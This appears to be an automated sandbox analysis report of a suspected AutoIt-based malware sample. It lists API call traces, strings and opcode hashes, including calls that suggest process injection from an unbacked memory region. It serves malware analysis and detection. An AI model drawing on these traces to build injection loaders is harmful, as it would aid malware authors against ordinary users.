              • Opcode ID: ea92b81b212d096856a76c79705f4e076e542716ddba99b25a2cb48f4fa618e6
              • Instruction ID: 6a9b397f0a8664fa6b1de827f49c658b2baa3dca5138f19f9e79fc226d788e79
              • Opcode Fuzzy Hash: ea92b81b212d096856a76c79705f4e076e542716ddba99b25a2cb48f4fa618e6
              • Instruction Fuzzy Hash: 55B27D74A08340CFDB24DF18D490A6AB7F2BF99310F24896EE8869B351D775ED41CB92

              Control-flow Graph

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015C26D1
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015C28F7
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
              • Instruction ID: 9321df6059c4d8a7ba7af8118766fd8e0c42b9d7aa68b4eb94e7d82b9eaa2216
              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
              • Instruction Fuzzy Hash: 61A1E674E00209EFDB14CFE4C894BEEBBB5BF48704F208559E601BB281D7799A81CB94

              Control-flow Graph

              APIs
              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006D2C91
              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006D2CB2
              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006D1CAD,?), ref: 006D2CC6
              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006D1CAD,?), ref: 006D2CCF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$CreateShow
              • String ID: AutoIt v3$edit
              • API String ID: 1584632944-3779509399
              • Opcode ID: 8af7501be3801dd75187bb8726b3ba6a6747097ff38a971ee5dfa69d0d93c0a4
              • Instruction ID: 787d24c39cf6fb796c215e81ff7ac9d04635382443816d346e496bd3e0d5c981
              • Opcode Fuzzy Hash: 8af7501be3801dd75187bb8726b3ba6a6747097ff38a971ee5dfa69d0d93c0a4
              • Instruction Fuzzy Hash: A2F0DA765403A07AFB311B17AC08E773EBDD7C7F61F40805AF900A29A0C6A91850DEB8

              Control-flow Graph

              APIs
                • Part of subcall function 015C22A0: Sleep.KERNELBASE(000001F4), ref: 015C22B1
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015C24F7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFileSleep
              • String ID: BK5I8PL0TMUA
              • API String ID: 2694422964-4168286228
              • Opcode ID: fb8660892dd52fe47b9c078653069ff0d547368b5b6709e27a79123520aeee8c
              • Instruction ID: 3959f679a6c69e0664cb0304b6e168e220770dcc11aa262a21d108794f4a7f42
              • Opcode Fuzzy Hash: fb8660892dd52fe47b9c078653069ff0d547368b5b6709e27a79123520aeee8c
              • Instruction Fuzzy Hash: 0E51A330E14248EBEF11DBE4D854BEFB775AF68700F004199E609BB2C0DAB91B45CBA5

              Control-flow Graph

              APIs
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00742C05
              • DeleteFileW.KERNEL32(?), ref: 00742C87
              • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00742C9D
              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00742CAE
              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00742CC0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$Delete$Copy
              • String ID:
              • API String ID: 3226157194-0
              • Opcode ID: f3528f63f7905f826e35ecdde586b6b69bc89900f1fa4381b82e3e7a41748364
              • Instruction ID: 445dfe9723d1cc7f5bda5f376bfaf13b66ee5bf9e829e6538597da3803ab7554
              • Opcode Fuzzy Hash: f3528f63f7905f826e35ecdde586b6b69bc89900f1fa4381b82e3e7a41748364
              • Instruction Fuzzy Hash: 10B16EB1D0011DABDF11DBA4CC85EEEBB7DEF48300F5040AAFA09E6152EB349A558F65

              Control-flow Graph (rendered basic-block graph not reproduced)
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: JOm
              • API String ID: 0-3333332779
              • Opcode ID: cde4c688588551de0a28c681058d18ecc55db013d10646234923373592580bfd
              • Instruction ID: ec307cee2fc0882e5dbade6ab52665bad6e072e5f87d58178f11db81b096e02d
              • Opcode Fuzzy Hash: cde4c688588551de0a28c681058d18ecc55db013d10646234923373592580bfd
              • Instruction Fuzzy Hash: 3451CEB190060AEFDF219FA4C849EBFBBF9AF45314F14025AF405A72D2D6799A01CF61
              APIs
              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006D3B0F,SwapMouseButtons,00000004,?), ref: 006D3B40
              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006D3B0F,SwapMouseButtons,00000004,?), ref: 006D3B61
              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006D3B0F,SwapMouseButtons,00000004,?), ref: 006D3B83
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID: Control Panel\Mouse
              • API String ID: 3677997916-824357125
              • Opcode ID: 2a1ac18a7148543ce1773203751be109abdcc8a83c13f953537b7875f6a4ae53
              • Instruction ID: a016f2bcac2245288c30e5814549a6a72c063dfa92362300d28b2eb19b8a528d
              • Opcode Fuzzy Hash: 2a1ac18a7148543ce1773203751be109abdcc8a83c13f953537b7875f6a4ae53
              • Instruction Fuzzy Hash: 64112AB5910218FFDB218FA5DC44AEEB7B9EF24744B10846BE845D7310E2719E409765
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 015C1A5B
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015C1AF1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015C1B13
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: 6e999cef06aac06fcde311c2673bbf8567a4d88a660ea8880241fb15dada5407
              • Instruction ID: 46ac78179c7dd6424199e40c8f378067642917b5b93fdca2f90491272fcde3dd
              • Opcode Fuzzy Hash: 6e999cef06aac06fcde311c2673bbf8567a4d88a660ea8880241fb15dada5407
              • Instruction Fuzzy Hash: 05620930A14618DBEB24DFA4C880BDEB772FF58700F1095A9D10DEB291E7799E81CB59
              APIs
              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007133A2
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006D3A04
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconLoadNotifyShell_String_wcslen
              • String ID: Line:
              • API String ID: 2289894680-1585850449
              • Opcode ID: 22f38ca05b49689f4b5831bfc65b7514d809a8680b9cb5b6447212e6e844c1f2
              • Instruction ID: 0354fac024e60cba6414f79df7e83547fb0b576bcdba87e76b01c74a7e09d29a
              • Opcode Fuzzy Hash: 22f38ca05b49689f4b5831bfc65b7514d809a8680b9cb5b6447212e6e844c1f2
              • Instruction Fuzzy Hash: 6531E171908324AED761EF20DC45BEBB7D9AB81710F00492FF59982391EB749A48C7DB
              APIs
              • GetOpenFileNameW.COMDLG32(?), ref: 00712C8C
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
                • Part of subcall function 006D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006D2DC4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Name$Path$FileFullLongOpen
              • String ID: X$`ey
              • API String ID: 779396738-2559956516
              • Opcode ID: e94d857ff92967d5dc60788d4c5aeac331d5f787aa5bd4110fd4c6f216114c4d
              • Instruction ID: f3acd069783520a3427f4d5b7f73361928434ce1b4181c12e51c1640b2e94f7e
              • Opcode Fuzzy Hash: e94d857ff92967d5dc60788d4c5aeac331d5f787aa5bd4110fd4c6f216114c4d
              • Instruction Fuzzy Hash: 8F21D571E002989FCF41EF94D805BEE7BFDAF49304F00805AE505A7381DBB85A898FA5
              APIs
              • __CxxThrowException@8.LIBVCRUNTIME ref: 006F0668
                • Part of subcall function 006F32A4: RaiseException.KERNEL32(?,?,?,006F068A,?,007A1444,?,?,?,?,?,?,006F068A,006D1129,00798738,006D1129), ref: 006F3304
              • __CxxThrowException@8.LIBVCRUNTIME ref: 006F0685
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Exception@8Throw$ExceptionRaise
              • String ID: Unknown exception
              • API String ID: 3476068407-410509341
              • Opcode ID: 04cd2d4aece033e5f30fe1706565f04eb0b4b2fff5dc98304b1211b91dd42301
              • Instruction ID: b9d73844da9c657c03d5d666fbaf22f2a80c3876ad2761b0dae18602de265253
              • Opcode Fuzzy Hash: 04cd2d4aece033e5f30fe1706565f04eb0b4b2fff5dc98304b1211b91dd42301
              • Instruction Fuzzy Hash: 81F0AF2490030D678F40BBA5EC46CBE7B6E5E40350B604139BA14D6697EF71EA268685
              APIs
              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0074302F
              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00743044
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Temp$FileNamePath
              • String ID: aut
              • API String ID: 3285503233-3010740371
              • Opcode ID: 12435f73c79b8c93f44dd01208a040813a5f9e4d8c42e0d4135ebda64f38900d
              • Instruction ID: c0ca576805dbb845f597cac923ba711d507ade49646d5fa07fe5abf165e31afc
              • Opcode Fuzzy Hash: 12435f73c79b8c93f44dd01208a040813a5f9e4d8c42e0d4135ebda64f38900d
              • Instruction Fuzzy Hash: B9D05B715003146BDA209794EC0DFD73A6CD704750F004251BA96D6091DAF89544CAD4
              APIs
              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007582F5
              • TerminateProcess.KERNEL32(00000000), ref: 007582FC
              • FreeLibrary.KERNEL32(?,?,?,?), ref: 007584DD
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CurrentFreeLibraryTerminate
              • String ID:
              • API String ID: 146820519-0
              • Opcode ID: 24c73e08cb2023b97aac20ce09ac73ba743f85452ce88929c1b519645db0b259
              • Instruction ID: 492b68a35eb308cde17d29ef77a5c1290b98a34d2730457b71771603d70e04b6
              • Opcode Fuzzy Hash: 24c73e08cb2023b97aac20ce09ac73ba743f85452ce88929c1b519645db0b259
              • Instruction Fuzzy Hash: 75128971A08341CFC754DF28C484B6ABBE1BF88315F04895DE8999B392DB74ED49CB92
              APIs
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006D1BF4
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 006D1BFC
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006D1C07
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006D1C12
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 006D1C1A
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 006D1C22
                • Part of subcall function 006D1B4A: RegisterWindowMessageW.USER32(00000004,?,006D12C4), ref: 006D1BA2
              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006D136A
              • OleInitialize.OLE32 ref: 006D1388
              • CloseHandle.KERNEL32(00000000,00000000), ref: 007124AB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
              • String ID:
              • API String ID: 1986988660-0
              • Opcode ID: 0bcfe639f88879c6f69d3b224a70e40c5c3f1fd45fd58c7fb386079a14c7a82a
              • Instruction ID: 9f17bce51822351b02d89f9c5d9e550283cde2b9cd763b378b77b8fce3830cc7
              • Opcode Fuzzy Hash: 0bcfe639f88879c6f69d3b224a70e40c5c3f1fd45fd58c7fb386079a14c7a82a
              • Instruction Fuzzy Hash: 0771ADB8D053508EE388DF79A8556653AE1BBCB394B84C22ED41ACB361EB3C4450CF4D
              APIs
              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,007085CC,?,00798CC8,0000000C), ref: 00708704
              • GetLastError.KERNEL32(?,007085CC,?,00798CC8,0000000C), ref: 0070870E
              • __dosmaperr.LIBCMT ref: 00708739
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
              • String ID:
              • API String ID: 490808831-0
              • Opcode ID: 1f3ace2534ec1a84c40c088d125207bb0b5266ea70c8fa8b1b060441bec4b30f
              • Instruction ID: 692483a3ab54d14df2aed2cacb12682a3488c419d939deebaf568e5245d38394
              • Opcode Fuzzy Hash: 1f3ace2534ec1a84c40c088d125207bb0b5266ea70c8fa8b1b060441bec4b30f
              • Instruction Fuzzy Hash: 6E018232604220D6C6A06374984977F6BC54B92778F3A0319F8449B1D3DEAECC818696
              APIs
              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00742CD4,?,?,?,00000004,00000001), ref: 00742FF2
              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00742CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00743006
              • CloseHandle.KERNEL32(00000000,?,00742CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0074300D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$CloseCreateHandleTime
              • String ID:
              • API String ID: 3397143404-0
              • Opcode ID: 4df2f300734c34f3ecb1ca41f86b93a254bf06f43d938499bfbbbc7d656619c2
              • Instruction ID: dd4e283d859ded6fdf0dd26c028b53e92d08271436bc54c910d74d90e3d2b355
              • Opcode Fuzzy Hash: 4df2f300734c34f3ecb1ca41f86b93a254bf06f43d938499bfbbbc7d656619c2
              • Instruction Fuzzy Hash: BCE0863228031477D6352756BC0DF9B3A5CD786B71F118210F7AA751D086E5250142AC
              APIs
              • __Init_thread_footer.LIBCMT ref: 006E17F6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: CALL
              • API String ID: 1385522511-4196123274
              • Opcode ID: eee7d7533a28968890ee83adcecab7fbe589680f0c135e2555e7e31d0d684d51
              • Instruction ID: f6da508861ad4953d508e1535e926df3e83e9875443ea41a12b65b0f5a42479b
              • Opcode Fuzzy Hash: eee7d7533a28968890ee83adcecab7fbe589680f0c135e2555e7e31d0d684d51
              • Instruction Fuzzy Hash: AE22BEB0609381DFC714DF15C480A2ABBF2BF86314F24895EF4968B3A2D735E955DB82
              APIs
              • _wcslen.LIBCMT ref: 00746F6B
                • Part of subcall function 006D4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LibraryLoad_wcslen
              • String ID: >>>AUTOIT SCRIPT<<<
              • API String ID: 3312870042-2806939583
              • Opcode ID: 6a1e7189b1a9f4296f1e9270f09763060aed262772cde34d576fae3515eb885b
              • Instruction ID: ba556efb17790d468b4679f8ad39c5c8b89a74873f183d39f8a95131d7afef9c
              • Opcode Fuzzy Hash: 6a1e7189b1a9f4296f1e9270f09763060aed262772cde34d576fae3515eb885b
              • Instruction Fuzzy Hash: C9B181315082018FCB58EF24D49196EB7E6BF94310F04895EF896973A2EF34ED49CB96
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID: EA06
              • API String ID: 2638373210-3962188686
              • Opcode ID: 2aaa211946ca004be0fbfac83bf44f52a32881ab08cbab255393847560222f4a
              • Instruction ID: 23abeb72c3a8032d126283f335a7ac7ed2691ffe952cb8db910ec02898426db4
              • Opcode Fuzzy Hash: 2aaa211946ca004be0fbfac83bf44f52a32881ab08cbab255393847560222f4a
              • Instruction Fuzzy Hash: 9F01B5729042587EDF58D7A8CC56EBEBBF8DB05305F00459EF252D21C2E5B9E7188B60
              APIs
              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006D3908
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconNotifyShell_
              • String ID:
              • API String ID: 1144537725-0
              • Opcode ID: adb28ec2223352f5104074ac1a07ba821361ee7aaaf62b0607d5f67549f1b09c
              • Instruction ID: 79c42ccf176c1bb4e22486b7fba26b862c6b782aefb7d067f0c048c44b7b10dd
              • Opcode Fuzzy Hash: adb28ec2223352f5104074ac1a07ba821361ee7aaaf62b0607d5f67549f1b09c
              • Instruction Fuzzy Hash: 29317F709043119FE761DF24D885797BBE8FB49708F00092EF59A97380E7B5AA44CB56
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 015C1A5B
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015C1AF1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015C1B13
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
              • Instruction ID: 290e586d83c023560375128fe4b0b6ad46a6e6a3487f0249fb8dfae510fcf06d
              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
              • Instruction Fuzzy Hash: 3E12DC24A24658C6EB24DF64D8507DEB232FF68700F1090E9910DEB7A5E77A4E81CF5A
              APIs
                • Part of subcall function 006D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E9C
                • Part of subcall function 006D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006D4EAE
                • Part of subcall function 006D4E90: FreeLibrary.KERNEL32(00000000,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EC0
              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EFD
                • Part of subcall function 006D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E62
                • Part of subcall function 006D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006D4E74
                • Part of subcall function 006D4E59: FreeLibrary.KERNEL32(00000000,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E87
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$Load$AddressFreeProc
              • String ID:
              • API String ID: 2632591731-0
              • Opcode ID: 3384d938227856286177b584c6346504aad8db13baf462737e5054dba906d9d4
              • Instruction ID: 3769fc95d8d3bfc9fa5135d166221eefd0471c2d829a7552919076a1cec7f099
              • Opcode Fuzzy Hash: 3384d938227856286177b584c6346504aad8db13baf462737e5054dba906d9d4
              • Instruction Fuzzy Hash: C511E332A10205ABCB14AF64DC06FAD77A6AF80710F10842FF542A62E1EE759E4597A8
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __wsopen_s
              • String ID:
              • API String ID: 3347428461-0
              APIs
                • Part of subcall function 00704C7D: RtlAllocateHeap.NTDLL(00000008,006D1129,00000000,?,00702E29,00000001,00000364,?,?,?,006FF2DE,00703863,007A1444,?,006EFDF5,?), ref: 00704CBE
              • _free.LIBCMT ref: 0070506C
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              APIs
              • RtlAllocateHeap.NTDLL(00000008,006D1129,00000000,?,00702E29,00000001,00000364,?,?,?,006FF2DE,00703863,007A1444,?,006EFDF5,?), ref: 00704CBE
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
